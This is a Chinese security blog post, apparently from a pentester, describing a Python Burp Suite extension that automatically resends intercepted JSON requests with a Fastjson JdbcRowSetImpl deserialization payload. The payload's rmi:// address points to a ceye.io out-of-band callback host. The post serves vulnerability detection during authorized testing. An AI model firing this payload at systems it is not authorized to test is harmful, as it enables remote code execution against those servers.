<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="渗透测试,BurpSuite,Fastjson,被动扫描," />





  <link rel="alternate" href="/atom.xml" title="瓦都剋" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="前言之前做渗透测试的时候遇到过一个问题，当时的渗透测试项目发现个漏洞是XXE漏洞，这个漏洞是手工发现的，当时也挂着扫描器的被动扫描模式也扫了一遍，但是没扫到。当时是利用插件的形式简单实验了下，但是漏报太多了。 趁着有时间，把之前计划的Burp Suite插件开发给做掉。 0x01 Fastjson反序列化漏洞简介 Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持">
<meta name="keywords" content="渗透测试,BurpSuite,Fastjson,被动扫描">
<meta property="og:type" content="article">
<meta property="og:title" content="BurpSuite插件开发之Fastjson自动化检测">
<meta property="og:url" content="http://byd.dropsec.xyz/2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/index.html">
<meta property="og:site_name" content="瓦都剋">
<meta property="og:description" content="前言之前做渗透测试的时候遇到过一个问题，当时的渗透测试项目发现个漏洞是XXE漏洞，这个漏洞是手工发现的，当时也挂着扫描器的被动扫描模式也扫了一遍，但是没扫到。当时是利用插件的形式简单实验了下，但是漏报太多了。 趁着有时间，把之前计划的Burp Suite插件开发给做掉。 0x01 Fastjson反序列化漏洞简介 Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blog.w2n1ck.com/load_plugin.png">
<meta property="og:image" content="http://blog.w2n1ck.com/fastjson_request.png">
<meta property="og:image" content="http://blog.w2n1ck.com/fastjson_result.png">
<meta property="og:image" content="http://blog.w2n1ck.com/fastjson_ceye.png">
<meta property="og:image" content="http://blog.w2n1ck.com/fastjson_server1.png">
<meta property="og:image" content="http://blog.w2n1ck.com/fastjson_server2.png">
<meta property="og:image" content="http://blog.w2n1ck.com/w2n1ck-code.gif">
<meta property="og:updated_time" content="2020-03-05T17:05:14.534Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BurpSuite插件开发之Fastjson自动化检测">
<meta name="twitter:description" content="前言之前做渗透测试的时候遇到过一个问题，当时的渗透测试项目发现个漏洞是XXE漏洞，这个漏洞是手工发现的，当时也挂着扫描器的被动扫描模式也扫了一遍，但是没扫到。当时是利用插件的形式简单实验了下，但是漏报太多了。 趁着有时间，把之前计划的Burp Suite插件开发给做掉。 0x01 Fastjson反序列化漏洞简介 Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持">
<meta name="twitter:image" content="http://blog.w2n1ck.com/load_plugin.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"hide","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"输入关键词进行搜索","hits_empty":"找不到关于“${query}”的文章","hits_stats":"共找到 ${hits} 篇文化在那个，花了 ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://byd.dropsec.xyz/2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/"/>





  <title>BurpSuite插件开发之Fastjson自动化检测 | 瓦都剋</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?61c879c1c104a92aab1d6e4b6888ffe5";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>











  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">瓦都剋</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Looking at yourself from a different Angle!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-wx">
          <a href="/wx" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-wrench"></i> <br />
            
            微信公众号
          </a>
        </li>
      
        
        <li class="menu-item menu-item-daohang">
          <a href="/daohang" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-globe"></i> <br />
            
            导航
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://byd.dropsec.xyz/2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="瓦都剋">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="瓦都剋">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">BurpSuite插件开发之Fastjson自动化检测</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-03-05T22:48:51+08:00">
                2020-03-05
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计</span>
                
                <span title="字数统计">
                  2,129
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长</span>
                
                <span title="阅读时长">
                  10
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>之前做渗透测试的时候遇到过一个问题，当时的渗透测试项目发现个漏洞是XXE漏洞，这个漏洞是手工发现的，当时也挂着扫描器的被动扫描模式也扫了一遍，但是没扫到。当时是利用插件的形式简单实验了下，但是漏报太多了。</p>
<p>趁着有时间，把之前计划的Burp Suite插件开发给做掉。</p>
<h3 id="0x01-Fastjson反序列化漏洞"><a href="#0x01-Fastjson反序列化漏洞" class="headerlink" title="0x01 Fastjson反序列化漏洞"></a>0x01 Fastjson反序列化漏洞</h3><h5 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h5><blockquote>
<p>Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。</p>
</blockquote>
<p>Fastjson相对其他JSON库的特点是快，从2011年Fastjson发布1.1.x版本之后，其性能从未被其他Java实现的JSON库超越。</p>
<p>之前做XXE测试的时候如果遇到<code>Content-Type</code>是<code>application/json</code>的时候都喜欢改为<code>`application/xml</code>然后发个XXE的payload探测能不能解析xml文档，再进行下一步的测试，现在又要加Fastjson、Jackson的payload来测试是否有RCE的漏洞，这样的话效率就太低了。</p>
<p>由于大部分的测试都离不开Burp，所以，借助Burp插件即可帮我们自动化进行这些测试。</p>
<h3 id="0x02-插件中用到的类和方法"><a href="#0x02-插件中用到的类和方法" class="headerlink" title="0x02 插件中用到的类和方法"></a>0x02 插件中用到的类和方法</h3><p>由于我们的目标是想实现只要有流量就对流量进行筛选，然后进行漏洞探测，所以并不是需要触发才扫描的。这样，文档找起来范围就缩小很多了。</p>
<h4 id="2-1-IBurpExtender"><a href="#2-1-IBurpExtender" class="headerlink" title="2.1 IBurpExtender"></a>2.1 IBurpExtender</h4><p>所有插件都必须实现这个接口。当我们在加载插件时，默认会调用IBurpExtender类下的registerExtenderCallbacks方法，并传递一个IBurpExtenderCallbacks对象，此对象在编写插件时会经常用到。</p>
<h4 id="2-2-IHttpListener"><a href="#2-2-IHttpListener" class="headerlink" title="2.2 IHttpListener"></a>2.2 IHttpListener</h4><p>该类是用来注册HTTP监听器，然后对获取到的请求或响应包进行处理，有个processHttpMessage的方法用于对请求和响应的数据包进行自定义操作，该方法在发送请求之前和接收响应之后会被调用。</p>
<h4 id="2-3-registerExtenderCallbacks"><a href="#2-3-registerExtenderCallbacks" class="headerlink" title="2.3 registerExtenderCallbacks"></a>2.3 registerExtenderCallbacks</h4><p>当我们在加载插件时，默认会调用IBurpExtender类下的registerExtenderCallbacks方法，并传递一个IBurpExtenderCallbacks对象，提供可由扩展调用的方法以执行各种操作。</p>
<h4 id="2-4-processHttpMessage"><a href="#2-4-processHttpMessage" class="headerlink" title="2.4 processHttpMessage"></a>2.4 processHttpMessage</h4><p>这是IHttpListener接口中唯一一个需要实现的方法，当通过<code>IBurpExtenderCallbacks.registerHttpListener()</code>注册了HTTP监听器后，所有的流量都会先传入processHttpMessage方法中进行处理。</p>
<p>ending…</p>
<p>真的就用到这么多…</p>
<h3 id="0x03-代码实现"><a href="#0x03-代码实现" class="headerlink" title="0x03 代码实现"></a>0x03 代码实现</h3><p>这里只以Fastjson为例，其他同理。</p>
<p>代码逻辑为监听所有来自proxy、repeater的流量，检查请求头和响应头中content-type的值是否为json，如果是，则格式化payload，build之后重新发送。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># /usr/bin/env python</span></div><div class="line"><span class="comment"># _*_ coding:utf-8 _*_</span></div><div class="line">__author__ = <span class="string">'瓦都剋'</span></div><div class="line"></div><div class="line"><span class="keyword">from</span> burp <span class="keyword">import</span> IBurpExtender</div><div class="line"><span class="keyword">from</span> burp <span class="keyword">import</span> IHttpListener</div><div class="line"><span class="keyword">from</span> burp <span class="keyword">import</span> IHttpRequestResponse</div><div class="line"><span class="keyword">from</span> burp <span class="keyword">import</span> IResponseInfo</div><div class="line"><span class="keyword">from</span> burp <span class="keyword">import</span> IRequestInfo</div><div class="line"><span class="keyword">from</span> burp <span class="keyword">import</span> IHttpService</div><div class="line"><span class="keyword">import</span> sys</div><div class="line"><span class="keyword">import</span> time</div><div class="line"><span class="keyword">import</span> os</div><div class="line"><span class="keyword">import</span> re</div><div class="line"></div><div class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</div><div class="line"><span class="keyword">import</span> random</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">randmd5</span><span class="params">()</span>:</span></div><div class="line">    new_md5 = md5()</div><div class="line">    new_md5.update(str(random.randint(<span class="number">1</span>, <span class="number">1000</span>)))</div><div class="line">    <span class="keyword">return</span> new_md5.hexdigest()[:<span class="number">6</span>]</div><div class="line"></div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">BurpExtender</span><span class="params">(IBurpExtender, IHttpListener)</span>:</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">registerExtenderCallbacks</span><span class="params">(self, callbacks)</span>:</span></div><div class="line">        print(<span class="string">"[+] #####################################"</span>)</div><div class="line">        print(<span class="string">"[+]     Fastjson Scan"</span>)</div><div class="line">        print(<span class="string">"[+]     Author: 瓦都剋"</span>)</div><div class="line">        print(<span class="string">"[+]     Email:  admin@w2n1ck.com"</span>)</div><div class="line">        print(<span class="string">"[+]     Blog:   https://www.w2n1ck.com"</span>)</div><div class="line">        print(<span class="string">"[+] #####################################"</span>)</div><div class="line">        self._callbacks = callbacks</div><div class="line">        self._helpers = callbacks.getHelpers()</div><div class="line">        callbacks.setExtensionName(<span class="string">'Fastjson Scan'</span>)</div><div class="line">        callbacks.registerHttpListener(self)</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">processHttpMessage</span><span class="params">(self, toolFlag, messageIsRequest, messageInfo)</span>:</span></div><div class="line">        <span class="comment"># if toolFlag == self._callbacks.TOOL_PROXY or toolFlag == self._callbacks.TOOL_REPEATER:</span></div><div class="line">        <span class="keyword">if</span> toolFlag == self._callbacks.TOOL_PROXY <span class="keyword">or</span> toolFlag == self._callbacks.TOOL_REPEATER:</div><div class="line">            <span class="comment"># 监听Response</span></div><div class="line">            <span class="keyword">if</span> <span class="keyword">not</span> messageIsRequest:</div><div class="line"></div><div class="line">                <span class="string">'''请求数据'''</span></div><div class="line">                <span class="comment"># 获取请求包的数据</span></div><div class="line">                resquest = messageInfo.getRequest()</div><div class="line">                analyzedRequest = self._helpers.analyzeRequest(resquest)</div><div class="line">                request_header = analyzedRequest.getHeaders()</div><div class="line">                request_bodys = resquest[analyzedRequest.getBodyOffset():].tostring()</div><div class="line">                request_host, request_Path = self.get_request_host(request_header)</div><div class="line">                request_contentType = analyzedRequest.getContentType()</div><div class="line"></div><div class="line">                <span class="string">'''响应数据'''</span></div><div class="line">                <span class="comment"># 获取响应包数据</span></div><div class="line">                response = messageInfo.getResponse()</div><div class="line">                analyzedResponse = self._helpers.analyzeResponse(response)  <span class="comment"># returns IResponseInfo</span></div><div class="line">                response_headers = analyzedResponse.getHeaders()</div><div class="line">                response_bodys = response[analyzedResponse.getBodyOffset():].tostring()</div><div class="line">                response_statusCode = analyzedResponse.getStatusCode()</div><div class="line">                expression = <span class="string">r'.*(application/json).*'</span></div><div class="line">                <span class="keyword">for</span> rpheader <span class="keyword">in</span> response_headers:</div><div class="line">                    <span class="keyword">if</span> rpheader.startswith(<span class="string">"Content-Type:"</span>) <span class="keyword">and</span> re.match(expression, rpheader):</div><div class="line">                        response_is_json = <span class="keyword">True</span></div><div class="line"></div><div class="line">                <span class="comment"># 获取服务信息</span></div><div class="line">                httpService = messageInfo.getHttpService()</div><div class="line">                port = httpService.getPort()</div><div class="line">                host = httpService.getHost()</div><div class="line"></div><div class="line">                <span class="comment"># 请求类型或响应类型是application/json</span></div><div class="line">                <span class="keyword">if</span> response_is_json <span class="keyword">or</span> request_contentType == <span class="number">4</span>:</div><div class="line">                    randomStr = randmd5()</div><div class="line">                    payload = <span class="string">'&#123;"a":&#123;"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"&#125;,"b":&#123;"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://&#123;&#125;.&#123;&#125;_&#123;&#125;.xxxxxx.ceye.io/Exploit","autoCommit":true&#125;&#125;'</span></div><div class="line">                    newBodyPayload = payload.format(str(randomStr), str(host), str(port))</div><div class="line">                    print(newBodyPayload)</div><div class="line">                    <span class="comment"># 将字符串转换为字节 https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#stringToBytes(java.lang.String)</span></div><div class="line">                    newBody = self._helpers.stringToBytes(newBodyPayload)</div><div class="line">                    <span class="comment"># 重构json格式的数据不能用buildParameter，要用buildHttpMessage替换整个body重构http消息。https://portswigger.net/burp/extender/api/burp/IExtensionHelpers.html#buildHttpMessage(java.util.List,%20byte[])</span></div><div class="line">                    newRequest = self._helpers.buildHttpMessage(request_header, newBody)</div><div class="line">                    ishttps = <span class="keyword">False</span></div><div class="line">                    expression = <span class="string">r'.*(443).*'</span></div><div class="line">                    <span class="keyword">if</span> re.match(expression, str(port)):</div><div class="line">                        ishttps = <span class="keyword">True</span></div><div class="line">                    rep = self._callbacks.makeHttpRequest(host, port, ishttps, newRequest)</div><div class="line"></div><div class="line">    <span class="comment"># 获取请求的url</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_request_host</span><span class="params">(self, reqHeaders)</span>:</span></div><div class="line">        uri = reqHeaders[<span class="number">0</span>].split(<span class="string">' '</span>)[<span class="number">1</span>]</div><div class="line">        host = reqHeaders[<span class="number">1</span>].split(<span class="string">' '</span>)[<span class="number">1</span>]</div><div class="line">        <span class="keyword">return</span> host, uri</div><div class="line"></div><div class="line">    <span class="comment"># 获取请求的一些信息：请求头，请求内容，请求方法，请求参数</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_request_info</span><span class="params">(self, request)</span>:</span></div><div class="line">        analyzedIRequestInfo = self._helpers.analyzeRequest(request)</div><div class="line">        reqHeaders = analyzedIRequestInfo.getHeaders()</div><div class="line">        reqBodys = request[analyzedIRequestInfo.getBodyOffset():].tostring()</div><div class="line">        reqMethod = analyzedIRequestInfo.getMethod()</div><div class="line">        reqParameters = analyzedIRequestInfo.getParameters()</div><div class="line">        reqHost, reqPath = self.get_request_host(reqHeaders)</div><div class="line">        reqContentType = analyzedIRequestInfo.getContentType()</div><div class="line">        print(reqHost, reqPath)</div><div class="line">        <span class="keyword">return</span> analyzedIRequestInfo, reqHeaders, reqBodys, reqMethod, reqParameters, reqHost, reqContentType</div><div class="line"></div><div class="line">    <span class="comment"># 获取响应的一些信息：响应头，响应内容，响应状态码</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_response_info</span><span class="params">(self, response)</span>:</span></div><div class="line">        analyzedIResponseInfo = self._helpers.analyzeRequest(response)</div><div class="line">        resHeaders = analyzedIResponseInfo.getHeaders()</div><div class="line">        resBodys = response[analyzedIResponseInfo.getBodyOffset():].tostring()</div><div class="line">        <span class="comment"># getStatusCode获取响应中包含的HTTP状态代码。返回：响应中包含的HTTP状态代码。</span></div><div class="line">        <span class="comment"># resStatusCode = analyzedIResponseInfo.getStatusCode()</span></div><div class="line">        <span class="keyword">return</span> resHeaders, resBodys</div><div class="line"></div><div class="line">    <span class="comment"># 获取服务端的信息，主机地址，端口，协议</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_server_info</span><span class="params">(self, httpService)</span>:</span></div><div class="line">        host = httpService.getHost()</div><div class="line">        port = httpService.getPort()</div><div class="line">        protocol = httpService.getProtocol()</div><div class="line">        <span class="keyword">return</span> host, port, protocol</div><div class="line"></div><div class="line">    <span class="comment"># 获取请求的参数名、参数值、参数类型（get、post、cookie-&gt;用来构造参数时使用）</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_parameter_Name_Value_Type</span><span class="params">(self, parameter)</span>:</span></div><div class="line">        parameterName = parameter.getName()</div><div class="line">        parameterValue = parameter.getValue()</div><div class="line">        parameterType = parameter.getType()</div><div class="line">        <span class="keyword">return</span> parameterName, parameterValue, parameterType</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">doActiveScan</span><span class="params">(self, baseRequestResponse, insertionPoint)</span>:</span></div><div class="line">        <span class="keyword">pass</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">doPassiveScan</span><span class="params">(self, baseRequestResponse)</span>:</span></div><div class="line">        self.issues = []</div><div class="line">        self.start_run(baseRequestResponse)</div><div class="line">        <span class="keyword">return</span> self.issues</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">consolidateDuplicateIssues</span><span class="params">(self, existingIssue, newIssue)</span>:</span></div><div class="line">        <span class="string">'''</span></div><div class="line"><span class="string">        相同的数据包，只报告一份报告</span></div><div class="line"><span class="string">        :param existingIssue:</span></div><div class="line"><span class="string">        :param newIssue:</span></div><div class="line"><span class="string">        :return:</span></div><div class="line"><span class="string">        '''</span></div><div class="line"></div><div class="line">        <span class="keyword">if</span> existingIssue.getIssueDetail() == newIssue.getIssueDetail():</div><div class="line">            <span class="keyword">return</span> <span class="number">-1</span></div><div class="line"></div><div class="line">        <span class="keyword">return</span> <span class="number">0</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">CustomScanIssue</span><span class="params">(IScanIssue)</span>:</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, httpService, url, httpMessages, name, detail, severity)</span>:</span></div><div class="line">        <span class="string">'''</span></div><div class="line"><span class="string">        :param httpService: HTTP服务</span></div><div class="line"><span class="string">        :param url: 漏洞url</span></div><div class="line"><span class="string">        :param httpMessages: HTTP消息</span></div><div class="line"><span class="string">        :param name: 漏洞名</span></div><div class="line"><span class="string">        :param detail: 漏洞细节</span></div><div class="line"><span class="string">        :param severity: 漏洞等级</span></div><div class="line"><span class="string">        '''</span></div><div class="line">        self._httpService = httpService</div><div class="line">        self._url = url</div><div class="line">        self._httpMessages = httpMessages</div><div class="line">        self._name = name</div><div class="line">        self._detail = detail</div><div class="line">        self._severity = severity</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getUrl</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> self._url</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getIssueName</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> self._name</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getIssueType</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> <span class="number">0</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getSeverity</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> self._severity</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getConfidence</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> <span class="string">"Certain"</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getIssueBackground</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">pass</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getRemediationBackground</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">pass</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getIssueDetail</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> self._detail</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getRemediationDetail</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">pass</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getHttpMessages</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> self._httpMessages</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getHttpService</span><span class="params">(self)</span>:</span></div><div class="line">        <span class="keyword">return</span> self._httpService</div></pre></td></tr></table></figure>
<p>后面的一些方法和类是为了后续实现其他东西自己预留的。</p>
<h3 id="0x04-漏洞检测"><a href="#0x04-漏洞检测" class="headerlink" title="0x04 漏洞检测"></a>0x04 漏洞检测</h3><p>加载插件</p>
<p><img src="http://blog.w2n1ck.com/load_plugin.png" alt=""></p>
<p>部署docker漏洞环境，请求数据</p>
